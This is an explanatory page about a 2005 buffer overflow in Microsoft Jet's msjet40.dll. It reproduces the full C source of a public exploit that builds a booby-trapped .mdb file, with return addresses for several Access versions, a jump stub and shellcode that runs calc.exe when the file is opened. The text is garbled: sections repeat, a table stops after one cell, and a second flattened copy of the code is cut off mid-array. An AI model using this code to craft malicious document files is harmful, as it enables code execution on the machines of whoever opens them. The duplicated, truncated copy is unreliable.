Microsoft Jet Database ('msjet40.dll') DB File Buffer Overflow Explained

What this paper is

This paper describes a buffer overflow vulnerability in the Microsoft Jet Database Engine, specifically within the msjet40.dll library. When a specially crafted .mdb (Microsoft Access Database) file is opened by an application that uses this DLL (like Microsoft Access itself), it can trigger a buffer overflow. This overflow allows an attacker to overwrite critical memory regions, including the instruction pointer (EIP), leading to the execution of arbitrary code. The exploit provided aims to launch calc.exe on the vulnerable system.

Simple technical breakdown

The core of the vulnerability lies in how msjet40.dll handles certain data within a .mdb file. The exploit modifies a specific section of the database file. This malformed data is then processed by the DLL, and due to insufficient validation, a buffer overflow occurs.

This overflow allows the attacker to control the program's execution flow by overwriting the return address or other control structures on the stack. The exploit specifically targets a mechanism that leads to a jmp edx instruction, where edx can be controlled by the attacker to point to their injected shellcode. The provided exploit uses a known offset for Microsoft Access to achieve this control.

Complete code and payload walkthrough

The C code provided constructs a malicious .mdb file. Let's break down the components:

Data Structures and Variables:

header[]: This array contains the initial bytes that form the beginning of a valid-looking .mdb file structure. It likely sets up the file header and some initial database metadata.
- Practical Purpose: Establishes a recognizable .mdb file format to avoid immediate rejection by the Jet engine.
body[]: This is a significant portion of the malformed data. It contains bytes that, when processed by the vulnerable msjet40.dll function, contribute to the buffer overflow. This section likely contains padding and specific values designed to trigger the overflow at a predictable location.
- Practical Purpose: Contains data that, when interpreted by the vulnerable parsing logic, leads to the overflow condition.
shell_jmp[]: This small array contains assembly instructions.
- \x14\x00: This is likely part of an expanded ID parameter, as noted in the comment. It's designed to accommodate the subsequent instructions.
- \x83\xC6\x08: ADD ESI, 0x8. This instruction adds 8 to the ESI register. In this context, ESI is expected to be pointing to the start of the shellcode. Adding 8 might be to skip a small preamble or a jump instruction within the shellcode itself.
- \xFF\xE6: JMP ESI. This instruction jumps to the address stored in the ESI register, effectively executing the shellcode.
- \x90\x90\x90\x90 (repeated): These are NOP (No Operation) instructions. They are often used for padding or to ensure alignment. In this case, they are not directly used by the jmp edx mechanism but might be part of the overall structure or a fallback.
- Practical Purpose: This is the crucial jump instruction that redirects execution to the attacker's shellcode after the overflow has occurred and control has been gained.
EIP[]: This array contains a 4-byte address. The comments indicate different addresses for different versions of Microsoft Access.
- "\xF7\x69\x05\x30" (default): This is the address 0x300569F7. This address is expected to contain an instruction like JMP EDX or a similar indirect jump. When the overflow occurs, the attacker overwrites the return address or a similar control flow pointer with this value. The msjet40.dll code then executes this address, which in turn jumps to EDX. EDX is then controlled by the attacker to point to the shellcode.
- Practical Purpose: This is the target address that the vulnerable function will jump to after the overflow, initiating the controlled execution path.
vuln_param[]: This section contains data that is manipulated by the vulnerable code.
- "\x18\x00\x50\x00\x61\x00\x72\x00\x65\x00\x6E\x00\x74\x00\x49\x00\x64\x00\x4E\x00\x61\x00\x6D\x00\x65\x00\x00\x01": This part seems to define a parameter, possibly a string, with a specific value 0x0100 at the end. The comment // 0100 will result in EDX pointing to a variable containing our MSAccess offset is key. This 0x0100 value is likely interpreted as a signed integer and used in an arithmetic operation (like eax*4 mentioned in the narrative) to calculate an offset into a table. This offset then points to a memory location that holds the address of the jmp edx instruction.
- "\x04\x06\x00\x00\x05\x06": Additional data that likely forms part of the structure being processed.
- Practical Purpose: This section provides the specific input that triggers the vulnerable code path and influences the calculation of the jump target.
shellcode[]: This is the actual payload that will be executed.
- "\x29\xC9\x83\xE9\xDB\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xA9\x67\x4A\xCC\x83\xEB\xFC\xE2\xF4\x55\x8F\x0C\xCC\xA9\x67\xC1\x89\x95\xEC\x36\xC9\xD1\x66\xA5\x47\xE6\x7F\xC1\x93\x89\x66\xA1\x2F\x87\x2E\xC1\xF8\x22\x66\xA4\xFD\x69\xFE\xE6\x48\x69\x13\x4D\x0D\x63\x6A\x4B\x0E\x42\x93\x71\x98\x8D\x63\x3F\x2F\x22\x38\x6E\xCD\x42\x01\xC1\xC0\xE2\xEC\x15\xD0\xA8\x8C\xC1\xD0\x22\x66\xA1\x45\xF5\x43\x4E\x0F\x98\xA7\x2E\x47\xE9\x57\xCF\x0C\xD1\x68\xC1\x8C\xA5\xEC\x3A\xD0\x04\xEC\x22\xC4\x40\x6C\x4A\xCC\xA9\xEC\x0A\xF8\xAC\x1B\x4A\xCC\xA9\xEC\x22\xF0\xF6\x56\xBC\xAC\xFF\x8C\x47\xA4\xD7\xBF\xA8\xBF\xC1\xFF\xB4\x46\xA7\x30\xB5\x2B\x41\x89\xB5\x33\x56\x04\x2B\xA0\xCA\x49\x2F\xB4\xCC\x67\x4A\xCC": This is a sequence of bytes representing machine code. The comment indicates it invokes Calc.exe. This is a standard Windows API call, likely using functions like CreateProcess or ShellExecute indirectly. The shellcode is designed to be position-independent and execute its task without relying on specific memory addresses within the vulnerable process.
- Practical Purpose: The payload that achieves the attacker's objective, in this case, launching calc.exe.
body2[]: Another segment of data that contributes to the overall .mdb file structure and potentially the overflow.
- Practical Purpose: Completes the malformed .mdb file structure.
mdb[94208]: A large character array that will hold the complete, constructed malicious .mdb file.
main() function:
- Handles command-line arguments, expecting a filename for the output .mdb file.
- Opens the specified file in binary write mode ("wb").
- Initializes the mdb buffer with null bytes (memset).
- Copies the header, body, shell_jmp, EIP, vuln_param, shellcode, and body2 into the mdb buffer at specific offsets. The -1 in sizeof(header)-1 and similar subtractions are common in C when dealing with string-like arrays that might have a null terminator, ensuring the correct number of bytes are copied. The memset calls with 0x43 (ASCII 'C') and the large 2924 byte padding are used to fill gaps and ensure the final file size is consistent or large enough.
- Writes the complete mdb buffer to the output file.
- Closes the file.
- Prints messages indicating success.

Code Fragment/Block -> Practical Purpose Mapping:

| Code Fragment/Block

Original Exploit-DB Content (Verbatim)

/* 
* --------------------------------------
*
* Microsoft Jet (msjet40.dll) Exploit
* 
* --------------------------------------
*
* Author:
* ----------
* S.Pearson
* Computer Terrorism (UK)
* www.computerterrorism.com
* 11/04/2005
*
*
* Credits:
* ----------
* Hexview (original advisory)
*
*
* Tested on:
* ------------- 
* Windows 2000 SP4 (english)
* Windows XP SP0 (english)
* Windows XP SP1 (english)
*
*
* Requires:
* ------------
* MSAccess offset for stable jmp edx (could use others)
*
* 0x3005AD47 (Microsoft Access 2003)					
* 0x300569F7 (Microsoft Access 2002) * DEFAULT *
* 0x3007F7FF (Microsoft Access 2000)
*					
*
* Tech Overview:	
* ------------------
* Simple exploit based upon Hexview's advisory
* released 01/04/2005.
*					
* Should invoke Calc.exe when opened
*
*
* Narrative:	
* ------------
* In the main this vulnerability is very simple to exploit
* although a little work is required to finally get to our 
* shellcode.
*
* As per the original advisory, insufficient data
* validation is not performed when msjet40.dll 
* parses a database file. Accordingly, by modifying 
* parts of a .mdb database file, we can eventually 
* gain control of the EIP.
*
*
* A database.mdb file is modified at the following location
*
* 00002310:  65 00 00 01 <--- vulnerable value in AX (0100) 
*
* The value goes through a signed expansion that is 
* used to access a 32-bit pointer to the variable that 
* stores the address of a call table.
*
* mov     ecx, [edi+eax*4+0B0h]	// edx now points to an offset
* mov     edx, [ecx]			// from our malformed file
* call    dword ptr [edx+10h]		// (MSAccess jmp edx)
*
*
* jmp	edx	// EDX points to start of shell_jmp										  
* add	esi,8	// Sets up esi to point to main shell						  
* call	esi	// Execute Shellcode														
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


char header[]=

"\x00\x01\x00\x00\x53\x74\x61\x6E\x64\x61\x72\x64\x20\x4A\x65\x74"
"\x20\x44\x42\x00\x01\x00\x00\x00\xB5\x6E\x03\x62\x60\x09\xC2\x55"
"\xE9\xA9\x67\x72\x40\x3F\x00\x9C\x7E\x9F\x90\xFF\x85\x9A\x31\xC5"
"\x79\xBA\xED\x30\xBC\xDF\xCC\x9D\x63\xD9\xE4\xC3\x9F\x46\xFB\x8A"
"\xBC\x4E\xB2\x6D\xEC\x37\x69\xD2\x9C\xFA\xF2\xC8\x28\xE6\x27\x20"
"\x8A\x60\x60\x02\x7B\x36\xC1\xE4\xDF\xB1\x43\x62\x13\x43\xFB\x39"
"\xB1\x33\x00\xF7\x79\x5B\xA6\x23\x7C\x2A\xAF\xD0\x7C\x99\x08\x1F"
"\x98\xFD\x1B\xC9\x5A\x6A\xE2\xF8\x82\x66\x5F\x95\xF8\xD0\x89\x24"
"\x85\x67\xC6\x1F\x27\x44\xD2\xEE\xCF\x65\xED\xFF\x07\xC7\x46\xA1"
"\x78\x16\x0C\xED\xE9\x2D\x62\xD4\x54\x06\x00\x00\x34\x2E\x30\x00";



char body[]=

"\x00\x00\x80\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\x02\x01\xDE\x0B\x00\x00\x00\x00\x90\x90\x90\x90\x59\x06\x00\x00"
"\x11\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x53\x11\x00\x0B\x00\x11\x00\x02"
"\x00\x00\x00\x02\x00\x00\x00\x00\x06\x00\x00\x01\x06\x00\x00\x00"
"\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11"
"\x00\x00\x00\x00\x00\x00\x00\x0C\x59\x06\x00\x00\x09\x00\x03\x00"
"\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x0C\x59\x06\x00\x00\x08\x00\x02\x00\x00\x00\x09\x04\x00\x00\x12"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x59\x06\x00\x00\x04\x00"
"\x01\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00\x0a\x00"
"\x08\x00\x08\x59\x06\x00\x00\x05\x00\x01\x00\x00\x00\x09\x04\x00"
"\x00\x13\x00\x00\x00\x00\x00\x12\x00\x08\x00\x04\x59\x06\x00\x00"
"\x07\x00\x02\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00"
"\x1A\x00\x04\x00\x0A\x59\x06\x00\x00\x0A\x00\x04\x00\x00\x00\x09"
"\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\xFE\x01\x04\x59\x06"
"\x00\x00\x00\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00"
"\x00\x00\x00\x00\x04\x00\x0B\x59\x06\x00\x00\x0D\x00\x07\x00\x00"
"\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B"
"\x59\x06\x00\x00\x10\x00\x0A\x00\x00\x00\x09\x04\x00\x00\x12\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x59\x06\x00\x00\x0F\x00\x09"
"\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x0B\x59\x06\x00\x00\x0E\x00\x08\x00\x00\x00\x09\x04\x00\x00"
"\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x59\x06\x00\x00\x02"
"\x00\x00\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00"
"\x00\xFE\x01\x09\x59\x06\x00\x00\x06\x00\x01\x00\x00\x00\x09\x04"
"\x00\x00\x32\x00\x00\x00\x00\x00\x00\x00\xFE\x01\x04\x59\x06\x00"
"\x00\x01\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00"
"\x00\x04\x00\x04\x00\x0B\x59\x06\x00\x00\x0C\x00\x06\x00\x00\x00"
"\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x59"
"\x06\x00\x00\x0B\x00\x05\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00"
"\x00\x00\x00\x00\x00\xFE\x01\x03\x59\x06\x00\x00\x03\x00\x01\x00"
"\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00\x08\x00\x02\x00"
"\x0E\x00\x43\x00\x6F\x00\x6E\x00\x6E\x00\x65\x00\x63\x00\x74\x00"
"\x10\x00\x44\x00\x61\x00\x74\x00\x61\x00\x62\x00\x61\x00\x73\x00"
"\x65\x00\x14\x00\x44\x00\x61\x00\x74\x00\x65\x00\x43\x00\x72\x00"
"\x65\x00\x61\x00\x74\x00\x65\x00\x14\x00\x44\x00\x61\x00\x74\x00"
"\x65\x00\x55\x00\x70\x00\x64\x00\x61\x00\x74\x00\x65\x00\x0A\x00"
"\x46\x00\x6C\x00\x61\x00\x67\x00\x73\x00\x16\x00\x46\x00\x6F\x00"
"\x72\x00\x65\x00\x69\x00\x67\x00\x6E\x00\x4E\x00\x61\x00\x6D\x00"
"\x65\x00\x04\x00\x49\x00\x64\x00\x04\x00\x4C\x00\x76\x00\x0E\x00"
"\x4C\x00\x76\x00\x45\x00\x78\x00\x74\x00\x72\x00\x61\x00\x10\x00"
"\x4C\x00\x76\x00\x4D\x00\x6F\x00\x64\x00\x75\x00\x6C\x00\x65\x00"
"\x0C\x00\x4C\x00\x76\x00\x50\x00\x72\x00\x6F\x00\x70\x00\x08\x00"
"\x4E\x00\x61\x00\x6D\x00\x65\x00\x0A\x00\x4F\x00\x77\x00\x6E\x00"
"\x65\x00\x72\x00\x10\x00\x50\x00\x61\x00\x72\x00\x65\x00\x6E\x00"
"\x74\x00\x49\x00\x64\x00\x16\x00\x52\x00\x6D\x00\x74\x00\x49\x00"
"\x6E\x00\x66\x00\x6F\x00\x4C\x00\x6F\x00\x6E\x00\x67\x00\x18\x00"
"\x52\x00\x6D\x00\x74\x00\x49\x00\x6E\x00\x66\x00\x6F\x00\x53\x00"
"\x68\x00\x6F\x00\x72\x00\x74\x00\x08\x00\x54\x00\x79\x00\x70\x00"
"\x65\x00\x83\x07\x00\x00\x01\x00\x01\x02\x00\x01\xFF\xFF\x00\xFF"
"\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF"
"\x00\xFF\xFF\x00\x10\x06\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00"
"\x81\x00\x00\x00\x00\x00\x83\x07\x00\x00\x00\x00\x01\xFF\xFF\x00"
"\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF"
"\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\x11\x06\x00\x00\x08\x00\x00\x00"
"\x00\x00\x00\x00\x81\x00\x00\x00\x00\x00\x59\x06\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x04"
"\x04\x01\x00\x00\x00\x00\x59\x06\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x04\x04\x00\x00\x00"
"\x00\x00";


char shell_jmp[]= 

"\x14\x00"		// Expanded ID Parameter (20 bytes) to accommodate this code
"\x83\xC6\x08"		// Add ESI,8 (Pointer to our shellcode)
"\xFF\xE6"		// Call ESI (Execute Shellcode)
"\x90\x90\x90\x90"   
"\x90\x90\x90\x90"		// Not used
"\x90\x90\x90";


char EIP[]=


//"\x47\xAD\x05\x30";	// MSAccess 2003 (jmp edx) 
"\xF7\x69\x05\x30";	// MSAccess 2002 (jmp edx) 
//"\xFf\xf7\x07\x30";	// MSAccess 2000 (jmp edx) 


char vuln_param[]=				   

"\x18\x00\x50\x00"
"\x61\x00\x72\x00"
"\x65\x00\x6E\x00"
"\x74\x00\x49\x00"
"\x64\x00\x4E\x00"
"\x61\x00\x6D\x00"
"\x65\x00\x00\x01"		// 0100 will result in EDX pointing to a 
			// variable containing our MSAccess offset 
					
"\x04\x06\x00\x00"
"\x05\x06" ;




char shellcode[]= 

/* Invokes Calc.exe in another Process
*/

"\x29\xC9\x83\xE9\xDB\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xA9"
"\x67\x4A\xCC\x83\xEB\xFC\xE2\xF4\x55\x8F\x0C\xCC\xA9\x67\xC1\x89"
"\x95\xEC\x36\xC9\xD1\x66\xA5\x47\xE6\x7F\xC1\x93\x89\x66\xA1\x2F"
"\x87\x2E\xC1\xF8\x22\x66\xA4\xFD\x69\xFE\xE6\x48\x69\x13\x4D\x0D"
"\x63\x6A\x4B\x0E\x42\x93\x71\x98\x8D\x63\x3F\x2F\x22\x38\x6E\xCD"
"\x42\x01\xC1\xC0\xE2\xEC\x15\xD0\xA8\x8C\xC1\xD0\x22\x66\xA1\x45"
"\xF5\x43\x4E\x0F\x98\xA7\x2E\x47\xE9\x57\xCF\x0C\xD1\x68\xC1\x8C"
"\xA5\xEC\x3A\xD0\x04\xEC\x22\xC4\x40\x6C\x4A\xCC\xA9\xEC\x0A\xF8"
"\xAC\x1B\x4A\xCC\xA9\xEC\x22\xF0\xF6\x56\xBC\xAC\xFF\x8C\x47\xA4"
"\xD7\xBF\xA8\xBF\xC1\xFF\xB4\x46\xA7\x30\xB5\x2B\x41\x89\xB5\x33"
"\x56\x04\x2B\xA0\xCA\x49\x2F\xB4\xCC\x67\x4A\xCC";

char body2[]= 

"\x02\x01\xA9\x0E\x00\x00\x00\x00\x4F\x01\x00\x00\x59\x06\x00\x00"
"\x34\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x53\x04\x00\x01\x00\x04\x00\x01"
"\x00\x00\x00\x01\x00\x00\x00\x12\x06\x00\x00\x13\x06\x00\x00\x00"
"\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x04\x59\x06\x00\x00"
"\x02\x00\x01\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00"
"\x04\x00\x04\x00\x01\x59\x06\x00\x00\x03\x00\x01\x00\x00\x00\x09"
"\x04\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x59\x06"
"\x00\x00\x00\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00"
"\x00\x00\x00\x00\x04\x00\x09\x59\x06\x00\x00\x01\x00\x00\x00\x00"
"\x00\x09\x04\x00\x00\x32\x00\x00\x00\x00\x00\x07\x00\xFE\x01\x06"
"\x00\x41\x00\x43\x00\x4D\x00\x18\x00\x46\x00\x49\x00\x6E\x00\x68"
"\x00\x65\x00\x72\x00\x69\x00\x74\x00\x61\x00\x62\x00\x6C\x00\x65"
"\x00\x10\x00\x4F\x00\x62\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x49"
"\x00\x64\x00\x06\x00\x53\x00\x49\x00\x44\x00\x83\x07\x00\x00\x00"
"\x00\x01\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x09\xFF\xFF\x00\xFF\xFF"
"\x00\xFF\xFF\x00\xFF\xFF\x04\xFF\xFF\x12\xFF\xFF\x00\x14\x06\x00"
"\x00\x09\x000\x0\x00\x41\x00\x74\x00\x88\x00\x00\x00\x00\x00\x59"
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF"
"\x00\x00\x00\x00\x04\x04\x00\x00\x00\x00\x00\x10\x00\x4F\x00\x62"
"\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x49\x00\x64\x00\xFF\xFF\x00";

char mdb[94208];

int main(int argc,char *argv[])
{

FILE *filename_mdb;
if(argc == 1)
{
printf("\nMicrosoft Jet (msjet40.dll) Exploit\n");
printf("===================================\n\n");
printf("Author:       S.Pearson\n");
printf("Organisation: Computer Terrorism (UK)\n\n");
printf("Usage: %s <filename.mdb>\n",argv[0]);
return 1;
}

filename_mdb = fopen(argv[1],"wb");

memset(mdb,0x00,sizeof(mdb)); //fill with nulls
memcpy(mdb,header,sizeof(header)); 
memset(mdb+sizeof(header)-1,0x43, 7968);
memcpy(mdb+sizeof(header)-1+7969-1,body, sizeof(body));
memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1,shell_jmp, sizeof(shell_jmp));
memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1, EIP, sizeof(EIP));
memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1, vuln_param, sizeof(vuln_param));
memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+sizeof(vuln_param)-1, shellcode, sizeof(shellcode));
memset(mdb+sizeof(header)-1+7968-1+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+sizeof(vuln_param)-1+sizeof(shellcode), 0x43, 2924);
memcpy(mdb+sizeof(header)-1+7968-1+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+sizeof(vuln_param)-1+sizeof(shellcode)-1+2924-1,body2,sizeof(body2));


if(filename_mdb)
{
fwrite(mdb,1,sizeof(mdb),filename_mdb);
fclose(filename_mdb);
}
printf("Malformed .mdb file created.\n");
printf("Now open with MSAccess.\n");
return 0;
}

// milw0rm.com [2005-04-11]

What this paper is

Simple technical breakdown

Complete code and payload walkthrough

The C code provided constructs a malicious .mdb file. Let's break down the components:

Data Structures and Variables:

header[]: This array contains the initial bytes that form the beginning of a valid-looking .mdb file structure. It likely sets up the file header and some initial database metadata.

Practical Purpose: Establishes a recognizable .mdb file format to avoid immediate rejection by the Jet engine.

body[]: This is a significant portion of the malformed data. It contains bytes that, when processed by the vulnerable msjet40.dll function, contribute to the buffer overflow. This section likely contains padding and specific values designed to trigger the overflow at a predictable location.

Practical Purpose: Contains data that, when interpreted by the vulnerable parsing logic, leads to the overflow condition.

shell_jmp[]: This small array contains assembly instructions.

\x14\x00: This is likely part of an expanded ID parameter, as noted in the comment. It's designed to accommodate the subsequent instructions.
\x83\xC6\x08: ADD ESI, 0x8. This instruction adds 8 to the ESI register. In this context, ESI is expected to be pointing to the start of the shellcode. Adding 8 might be to skip a small preamble or a jump instruction within the shellcode itself.
\xFF\xE6: JMP ESI. This instruction jumps to the address stored in the ESI register, effectively executing the shellcode.
\x90\x90\x90\x90 (repeated): These are NOP (No Operation) instructions. They are often used for padding or to ensure alignment. In this case, they are not directly used by the jmp edx mechanism but might be part of the overall structure or a fallback.
Practical Purpose: This is the crucial jump instruction that redirects execution to the attacker's shellcode after the overflow has occurred and control has been gained.

EIP[]: This array contains a 4-byte address. The comments indicate different addresses for different versions of Microsoft Access.

"\xF7\x69\x05\x30" (default): This is the address 0x300569F7. This address is expected to contain an instruction like JMP EDX or a similar indirect jump. When the overflow occurs, the attacker overwrites the return address or a similar control flow pointer with this value. The msjet40.dll code then executes this address, which in turn jumps to EDX. EDX is then controlled by the attacker to point to the shellcode.
Practical Purpose: This is the target address that the vulnerable function will jump to after the overflow, initiating the controlled execution path.

vuln_param[]: This section contains data that is manipulated by the vulnerable code.

"\x18\x00\x50\x00\x61\x00\x72\x00\x65\x00\x6E\x00\x74\x00\x49\x00\x64\x00\x4E\x00\x61\x00\x6D\x00\x65\x00\x00\x01": This part seems to define a parameter, possibly a string, with a specific value 0x0100 at the end. The comment // 0100 will result in EDX pointing to a variable containing our MSAccess offset is key. This 0x0100 value is likely interpreted as a signed integer and used in an arithmetic operation (like eax*4 mentioned in the narrative) to calculate an offset into a table. This offset then points to a memory location that holds the address of the jmp edx instruction.
"\x04\x06\x00\x00\x05\x06": Additional data that likely forms part of the structure being processed.
Practical Purpose: This section provides the specific input that triggers the vulnerable code path and influences the calculation of the jump target.

shellcode[]: This is the actual payload that will be executed.

"\x29\xC9\x83\xE9\xDB\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xA9\x67\x4A\xCC\x83\xEB\xFC\xE2\xF4\x55\x8F\x0C\xCC\xA9\x67\xC1\x89\x95\xEC\x36\xC9\xD1\x66\xA5\x47\xE6\x7F\xC1\x93\x89\x66\xA1\x2F\x87\x2E\xC1\xF8\x22\x66\xA4\xFD\x69\xFE\xE6\x48\x69\x13\x4D\x0D\x63\x6A\x4B\x0E\x42\x93\x71\x98\x8D\x63\x3F\x2F\x22\x38\x6E\xCD\x42\x01\xC1\xC0\xE2\xEC\x15\xD0\xA8\x8C\xC1\xD0\x22\x66\xA1\x45\xF5\x43\x4E\x0F\x98\xA7\x2E\x47\xE9\x57\xCF\x0C\xD1\x68\xC1\x8C\xA5\xEC\x3A\xD0\x04\xEC\x22\xC4\x40\x6C\x4A\xCC\xA9\xEC\x0A\xF8\xAC\x1B\x4A\xCC\xA9\xEC\x22\xF0\xF6\x56\xBC\xAC\xFF\x8C\x47\xA4\xD7\xBF\xA8\xBF\xC1\xFF\xB4\x46\xA7\x30\xB5\x2B\x41\x89\xB5\x33\x56\x04\x2B\xA0\xCA\x49\x2F\xB4\xCC\x67\x4A\xCC": This is a sequence of bytes representing machine code. The comment indicates it invokes Calc.exe. This is a standard Windows API call, likely using functions like CreateProcess or ShellExecute indirectly. The shellcode is designed to be position-independent and execute its task without relying on specific memory addresses within the vulnerable process.
Practical Purpose: The payload that achieves the attacker's objective, in this case, launching calc.exe.

body2[]: Another segment of data that contributes to the overall .mdb file structure and potentially the overflow.

Practical Purpose: Completes the malformed .mdb file structure.

mdb[94208]: A large character array that will hold the complete, constructed malicious .mdb file.

main() function:

Handles command-line arguments, expecting a filename for the output .mdb file.
Opens the specified file in binary write mode ("wb").
Initializes the mdb buffer with null bytes (memset).
Copies the header, body, shell_jmp, EIP, vuln_param, shellcode, and body2 into the mdb buffer at specific offsets. The -1 in sizeof(header)-1 and similar subtractions are common in C when dealing with string-like arrays that might have a null terminator, ensuring the correct number of bytes are copied. The memset calls with 0x43 (ASCII 'C') and the large 2924 byte padding are used to fill gaps and ensure the final file size is consistent or large enough.
Writes the complete mdb buffer to the output file.
Closes the file.
Prints messages indicating success.

Code Fragment/Block -> Practical Purpose Mapping:

| Code Fragment/Block

Original Exploit-DB Content (Verbatim)

/* * -------------------------------------- * * Microsoft Jet (msjet40.dll) Exploit * * -------------------------------------- * * Author: * ---------- * S.Pearson * Computer Terrorism (UK) * www.computerterrorism.com * 11/04/2005 * * * Credits: * ---------- * Hexview (original advisory) * * * Tested on: * ------------- * Windows 2000 SP4 (english) * Windows XP SP0 (english) * Windows XP SP1 (english) * * * Requires: * ------------ * MSAccess offset for stable jmp edx (could use others) * * 0x3005AD47 (Microsoft Access 2003) * 0x300569F7 (Microsoft Access 2002) * DEFAULT * * 0x3007F7FF (Microsoft Access 2000) * * * Tech Overview: * ------------------ * Simple exploit based upon Hexview's advisory * released 01/04/2005. * * Should invoke Calc.exe when opened * * * Narrative: * ------------ * In the main this vulnerability is very simple to exploit * although a little work is required to finally get to our * shellcode. * * As per the original advisory, insufficient data * validation is not performed when msjet40.dll * parses a database file. Accordingly, by modifying * parts of a .mdb database file, we can eventually * gain control of the EIP. * * * A database.mdb file is modified at the following location * * 00002310: 65 00 00 01 <--- vulnerable value in AX (0100) * * The value goes through a signed expansion that is * used to access a 32-bit pointer to the variable that * stores the address of a call table. * * mov ecx, [edi+eax*4+0B0h] // edx now points to an offset * mov edx, [ecx] // from our malformed file * call dword ptr [edx+10h] // (MSAccess jmp edx) * * * jmp edx // EDX points to start of shell_jmp * add esi,8 // Sets up esi to point to main shell * call esi // Execute Shellcode * */ #include <stdio.h> #include <stdlib.h> #include <string.h> char header[]= "\x00\x01\x00\x00\x53\x74\x61\x6E\x64\x61\x72\x64\x20\x4A\x65\x74" "\x20\x44\x42\x00\x01\x00\x00\x00\xB5\x6E\x03\x62\x60\x09\xC2\x55" "\xE9\xA9\x67\x72\x40\x3F\x00\x9C\x7E\x9F\x90\xFF\x85\x9A\x31\xC5" "\x79\xBA\xED\x30\xBC\xDF\xCC\x9D\x63\xD9\xE4\xC3\x9F\x46\xFB\x8A" "\xBC\x4E\xB2\x6D\xEC\x37\x69\xD2\x9C\xFA\xF2\xC8\x28\xE6\x27\x20" "\x8A\x60\x60\x02\x7B\x36\xC1\xE4\xDF\xB1\x43\x62\x13\x43\xFB\x39" "\xB1\x33\x00\xF7\x79\x5B\xA6\x23\x7C\x2A\xAF\xD0\x7C\x99\x08\x1F" "\x98\xFD\x1B\xC9\x5A\x6A\xE2\xF8\x82\x66\x5F\x95\xF8\xD0\x89\x24" "\x85\x67\xC6\x1F\x27\x44\xD2\xEE\xCF\x65\xED\xFF\x07\xC7\x46\xA1" "\x78\x16\x0C\xED\xE9\x2D\x62\xD4\x54\x06\x00\x00\x34\x2E\x30\x00"; char body[]= "\x00\x00\x80\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\x02\x01\xDE\x0B\x00\x00\x00\x00\x90\x90\x90\x90\x59\x06\x00\x00" "\x11\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x53\x11\x00\x0B\x00\x11\x00\x02" 